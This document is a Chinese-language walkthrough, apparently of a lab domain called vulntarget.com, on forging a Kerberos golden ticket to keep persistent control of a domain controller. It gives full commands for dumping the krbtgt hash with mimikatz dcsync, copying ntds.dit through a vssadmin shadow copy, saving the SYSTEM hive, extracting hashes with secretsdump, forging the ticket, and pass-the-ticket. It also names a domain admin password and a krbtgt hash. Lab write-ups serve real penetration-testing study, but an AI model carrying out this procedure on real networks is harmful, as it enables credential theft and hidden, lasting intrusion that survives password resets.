实战中黄金票据的制作

实战中黄金票据的制作 0x00 前言

当控制了一台域控服务器的情况下，为了不打草惊蛇又为了长时间控制，可以考虑使用黄金票据进行权限维持。

目前以控制一台域内成员机器WIN2016，ip：10.0.10.111  无杀软

一台域控机器WIN2019，ip：10.0.10.110                           有杀软

域名：vulntarget.com

域管：vulntargetadministrator

域管密码：Admin@666

通过之前的攻击，我们拿到了域管理员的账号密码，并通过wmiexec成功从WIN2016连接并控制了WIN2019

 0x01 黄金票据制作前 前置条件

在使⽤⻩⾦票据（Golden Ticket）攻击时，需要以下信息：
需要伪造的域管理员⽤户名（⼀般是域管账户，这里我们就是administrator）
完整的域名
域 krbtgt SID（就是域成员krbtgt SID去掉最后的）
krbtgt 的 NTLM Hash 或 AES-256 值

krbtgt SID获取 

在WIN2019机器上执行以下命令

wmic useraccount get /all

 

我们不要后面的502（RID），只要：S-1-5-21-3795598892-1521228294-2653055093

krbtgt NTLM哈希获取

如果目标机器可以使用mimikatz的话那很简单

mimikatz.exe "log" "privilege::debug" "lsadump::dcsync /domain:vulntarget.com /user:krbtgt" "exit"

这就是我们想要获得的，但是目标机器存在杀软，假设我们也没有免杀的mimikatz，那么如何获得krbtgt的NTLM哈希呢，我们可以通过vssadmin将整个ntds.dit弄下来然后解密所有域内机器和用户的哈希。

vssadmin 是 Windows Server 2008 及 Windows 7 提供的 VSS 管理工具，可用于创建和删除卷影拷贝、列出卷影的信息（只能管理系统 Provider 创建的卷影拷⻉）、显示已安装的所有卷影拷贝写⼊程序（writers）和提供程序（providers），以及改变卷影拷⻉的存储空间（即所谓的“diff空间”）的大小等。

第一步：创建⼀个 C 盘的卷影拷贝

vssadmin create shadow /for=c:

第二步：在创建的卷影拷贝中将 ntds.dit 复制出来：

copy \?GLOBALROOTDeviceHarddiskVolumeShadowCopy2windowsNTDSntds.dit c:ntds.dit

 可以看到ntds.dit已经被复制出来

第三步：删除快照

vssadmin Delete Shadows /For=C: /Oldest

最后还需转储 system.hive，system.hive 中存放着ntds.dit的密钥，如果没有该密钥，将⽆法查看 ntds.dit 中的信息: 

reg save hklmsystem system.hive

此时我们会发现这两个文件已经被我们弄到了域控机器的C盘上了，但是如何在不免杀上线cs等c2工具上将这两个文件下载到我们控制的WIN2016机器上呢，我们可以用impacket工具包中的wmiexec.py连接控制域控，而不要使用wmiexec.vbs 因为前者自带一个lget命令（最新版impacket）get命令（旧版impacket）

 

 这样就可以了，我们将这两个文件都下载下来，然后再使用impacket工具包中的secretdump.py脚本

python3 secretsdump.py -system system.hive -ntds ntds.dit LOCAL

这样我们也成功拿到了krbtgt的NTLM哈希，准确的说我们要的是:后面那段：a3dd8e4a352b346f110b587e1d1d1936

0x02 黄金票据制作

所有需要的东西都拿到了，那我们就可以在本地无杀软的环境中利用mimikatz制作黄金票据

kerberos::golden /user:administrator /domain:vulntarget.com /sid:S-1-5-21-3795598892-1521228294-2653055093 /krbtgt:a3dd8e4a352b346f110b587e1d1d1936 /ticket:Administrator.kiribi

成功生成Administrator.kirbi的黄金票据。 接下来在WIN2016的机器上利用mimikatz进行票据传递

未注入前WIN2016连接域控是拒绝访问的

 不用管理员权限运行mimikatz，通过ptt的方法将票据传递过去，就可以访问域控了

 之后我们的打法就变成了IPC连接后的打法了，上传下载文件，计划任务执行啥的都可以后续继续 *** 作了，至于为啥一定要做个黄金票据权限维持呢，这样的好处就是如果域管账号密码更改了，我们也可以依然控制着域控，不会收到任何影响